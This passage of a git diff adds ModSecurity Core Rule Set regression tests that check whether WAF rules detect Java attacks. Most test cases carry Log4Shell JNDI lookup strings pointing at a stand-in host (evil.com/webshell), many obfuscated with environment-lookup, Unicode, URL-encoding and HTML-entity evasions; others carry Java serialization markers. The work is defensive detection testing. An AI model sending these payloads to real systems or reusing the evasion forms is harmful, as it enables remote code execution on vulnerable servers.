application/x-www-form-urlencoded + method: POST + port: 80 + uri: / + data: foo=${jndi:ldap://evil.com/webshell} + output: + log_contains: id "944151" + - test_title: 944151-2 + desc: Log4J exploit on User-Agent + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests ${jndi:ldap://evil.com/webshell} + method: GET + port: 80 + uri: / + output: + log_contains: id "944151" + - test_title: 944151-3 + desc: Log4J exploit in XML code + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/xml + method: POST + port: 80 + uri: / + data: + output: + log_contains: id "944151" + - test_title: 944151-4 + desc: Log4J exploit in XML code + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/xml + method: POST + port: 80 + uri: / + data: "${jndi:ldap://evil.com/webshell}" + output: + log_contains: id "944151" + - test_title: 944151-5 + desc: Log4J exploit on arg foo, with evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: / + data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} + output: + log_contains: id "944151" + - test_title: 944151-6 + desc: Log4J exploit on arg foo, with evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: / + data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} + output: + log_contains: id "944151" + - test_title: 944151-7 + desc: Log4J exploit on arg foo, with evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: / + data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} + output: + log_contains: id "944151" + - test_title: 944151-8 + desc: Log4J exploit on arg foo, with Unicode escape encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: / + data: foo=$\u007Bjndi:ldap://evil.com/webshell} + output: + log_contains: id "944151" + - test_title: 944151-9 + desc: Log4J exploit on JSON with URL encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944151" + - test_title: 944151-10 + desc: Log4J exploit on JSON with Unicode escape evasion, uppercase + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944151" + - test_title: 944151-11 + desc: Log4J exploit on JSON with Unicode escape evasion, lowercase + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944151" + - test_title: 944151-12 + desc: Log4J exploit on JSON with named HTML entity evasion, lower case + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944151" + - test_title: 944151-13 + desc: Log4J exploit on JSON with named HTML entity evasion, upper case + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944151" + - test_title: 944151-14 + desc: Log4J exploit on JSON with numeric HTML entity evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944151" + - test_title: 944151-15 + desc: Log4J exploit on JSON with Unicode escape evasion, wrapped in URL encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944151" + - test_title: 944151-16 + desc: Log4J exploit on JSON with URL encoding evasion, wrapped in Unicode escape evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944151" + - test_title: 944151-17 + desc: Log4J exploit on JSON with URL encoding evasion, mixed with Unicode escape evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944151" + - test_title: 944151-18 + desc: Log4J exploit on JSON with named HTML entity evasion wrapped in URL encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944151" + - test_title: 944151-19 + desc: Log4J exploit on JSON with numeric HTML entity evasion wrapped in URL encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944151" + - test_title: 944151-20 + desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944151" + - test_title: 944151-21 + desc: Log4J exploit on JSON with numeric HTML entity evasion, wrapped in Unicode escape evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944151" + - test_title: 944151-22 + desc: Log4J exploit on JSON with named and numeric HTML entity evasion, mixed with unicode escape evasion and URL encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944151" + - test_title: 944151-23 + desc: Log4J exploit on User-Agent header which is known to work against org.apache.commons:commons-text:1.9 + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: '${jndi:ldap://evil.om/w}' + Content-Type: text/html + method: GET + port: 80 + uri: / + output: + log_contains: id "944151" + - test_title: 944151-24 + desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion, omitting terminal semi-colon + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944151" + - test_title: 944151-25 + desc: Log4J exploit on arg foo, with evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: / + data: foo=$${env:somethingveryverylong:-${env:something:-$}{jndi:ldap://evilhost.com/webshell}}} + output: + log_contains: id "944151" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml new file mode 100644 index 00000000..44bc1440 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml @@ -0,0 +1,448 @@ +--- +# NOTE: Please keep these tests in sync with 944152.yaml and 944151.yaml. +# 944152 should detect the same things as 944152 and 944151. +meta: + author: "dune73, Max Leske" + enabled: true + name: "944152.yaml" + description: "Description" +tests: + - test_title: 944152-1 + desc: Log4J exploit on arg foo + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: / + data: foo=${jndi:ldap://evil.com/webshell} + output: + log_contains: id "944152" + - test_title: 944152-2 + desc: Log4J exploit on User-Agent + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests ${jndi:ldap://evil.com/webshell} + method: GET + port: 80 + uri: / + output: + log_contains: id "944152" + - test_title: 944152-3 + desc: Log4J exploit in XML code + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/xml + method: POST + port: 80 + uri: / + data: + output: + log_contains: id "944152" + - test_title: 944152-4 + desc: Log4J exploit in XML code + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/xml + method: POST + port: 80 + uri: / + data: "${jndi:ldap://evil.com/webshell}" + output: + log_contains: id "944152" + - test_title: 944152-5 + desc: Log4J exploit on arg foo, with evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: / + data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} + output: + log_contains: id "944152" + - test_title: 944152-6 + desc: Log4J exploit on arg foo, with evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: / + data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} + output: + log_contains: id "944152" + - test_title: 944152-7 + desc: Log4J exploit on arg foo, with evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: / + data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} + output: + log_contains: id "944152" + - test_title: 944152-8 + desc: Log4J exploit on arg foo, with Unicode escape encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: / + data: foo=$\u007Bjndi:ldap://evil.com/webshell} + output: + log_contains: id "944152" + - test_title: 944152-9 + desc: Log4J exploit on JSON with URL encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944152" + - test_title: 944152-10 + desc: Log4J exploit on JSON with Unicode escape evasion, uppercase + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944152" + - test_title: 944152-11 + desc: Log4J exploit on JSON with Unicode escape evasion, lowercase + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944152" + - test_title: 944152-12 + desc: Log4J exploit on JSON with named HTML entity evasion, lower case + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944152" + - test_title: 944152-13 + desc: Log4J exploit on JSON with named HTML entity evasion, upper case + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944152" + - test_title: 944152-14 + desc: Log4J exploit on JSON with numeric HTML entity evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944152" + - test_title: 944152-15 + desc: Log4J exploit on JSON with Unicode escape evasion, wrapped in URL encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944152" + - test_title: 944152-16 + desc: Log4J exploit on JSON with URL encoding evasion, wrapped in Unicode escape evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944152" + - test_title: 944152-17 + desc: Log4J exploit on JSON with URL encoding evasion, mixed with Unicode escape evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944152" + - test_title: 944152-18 + desc: Log4J exploit on JSON with named HTML entity evasion wrapped in URL encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944152" + - test_title: 944152-19 + desc: Log4J exploit on JSON with numeric HTML entity evasion wrapped in URL encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944152" + - test_title: 944152-20 + desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944152" + - test_title: 944152-21 + desc: Log4J exploit on JSON with numeric HTML entity evasion, wrapped in Unicode escape evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944152" + - test_title: 944152-22 + desc: Log4J exploit on JSON with named and numeric HTML entity evasion, mixed with unicode escape evasion and URL encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944152" + - test_title: 944152-23 + desc: Log4J exploit on User-Agent header which is known to work against org.apache.commons:commons-text:1.9 + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: '${jndi:ldap://evil.om/w}' + Content-Type: text/html + method: GET + port: 80 + uri: / + output: + log_contains: id "944152" + - test_title: 944152-24 + desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion, omitting terminal semi-colon + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944152" + - test_title: 944152-25 + desc: Log4J exploit on arg foo, with evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: / + data: foo=$${env:somethingveryverylong:-${env:something:-$}{jndi:ldap://evilhost.com/webshell}}} + output: + log_contains: id "944152" + - test_title: 944152-26 + desc: Log4J exploit on arg foo, with evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: / + data: '{"foo": "$\u0026lbracesomethingnotcoveredbyotherrules"}' + output: + log_contains: id "944152" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml new file mode 100644 index 00000000..288c536e --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml @@ -0,0 +1,17 @@ +--- +meta: + author: "spartantri" + enabled: true + name: "944200.yaml" + description: "Description" +tests: + - test_title: 944200-1 + desc: Argument test includes java serialization magic bytes, base64 encoded request + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + encoded_request: "UE9TVCAvIEhUVFAvMS4wDQpIb3N0OiBsb2NhbGhvc3QNClVzZXItQWdlbnQ6IE9XQVNQIE1vZFNlY3VyaXR5IENvcmUgUnVsZSBTZXQNCkFjY2VwdDogdGV4dC94bWwsYXBwbGljYXRpb24veG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCx0ZXh0L2h0bWw7cT0wLjksdGV4dC9wbGFpbjtxPTAuOCxpbWFnZS9wbmcsKi8qO3E9MC41DQpBY2NlcHQtQ2hhcnNldDogSVNPLTg4NTktMSx1dGYtODtxPTAuNywqO3E9MC43DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsZGVmbGF0ZQ0KQWNjZXB0LUxhbmd1YWdlOiBlbi11cyxlbjtxPTAuNQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvbnRlbnQtTGVuZ3RoOiA5DQoNCnRlc3Q9rO0ABQ0KDQo=" + output: + log_contains: "id \"944200\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml new file mode 100644 index 00000000..136522c0 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml @@ -0,0 +1,1057 @@ +--- +meta: + author: "spartantri" + enabled: true + name: "944210.yaml" + description: "Positive tests for rule 944210" +tests: + - test_title: 944210-1 + desc: "Argument test includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=rO0ABQ" + output: + log_contains: "id \"944210\"" + - test_title: 944210-2 + desc: "Argument name includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "rO0ABQ=test" + output: + log_contains: "id \"944210\"" + - test_title: 944210-3 + desc: "Cookie test includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=rO0ABQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-4 + desc: "Cookie name includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: rO0ABQ=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-5 + desc: "Request header test includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: rO0ABQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-6 + desc: "XML element includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944210\"" + - test_title: 944210-7 + desc: "XML attribute name includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944210\"" + - test_title: 944210-8 + desc: "XML attribute value includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-9 + desc: "XML element value includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "rO0ABQ" + output: + log_contains: "id \"944210\"" + - test_title: 944210-10 + desc: "Nested XML element value includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "rO0ABQ" + output: + log_contains: "id \"944210\"" + - test_title: 944210-11 + desc: "Content-Type text/plain includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=rO0ABQ" + output: + log_contains: "id \"944210\"" + - test_title: 944210-12 + desc: "Content-Type application/json arg value includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"rO0ABQ\"}" + output: + log_contains: "id \"944210\"" + - test_title: 944210-13 + desc: "Content-Type application/json arg name includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"rO0ABQ\": \"test\"}" + output: + log_contains: "id \"944210\"" + - test_title: 944210-14 + desc: "Content-Type multipart/form-data json arg name includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + 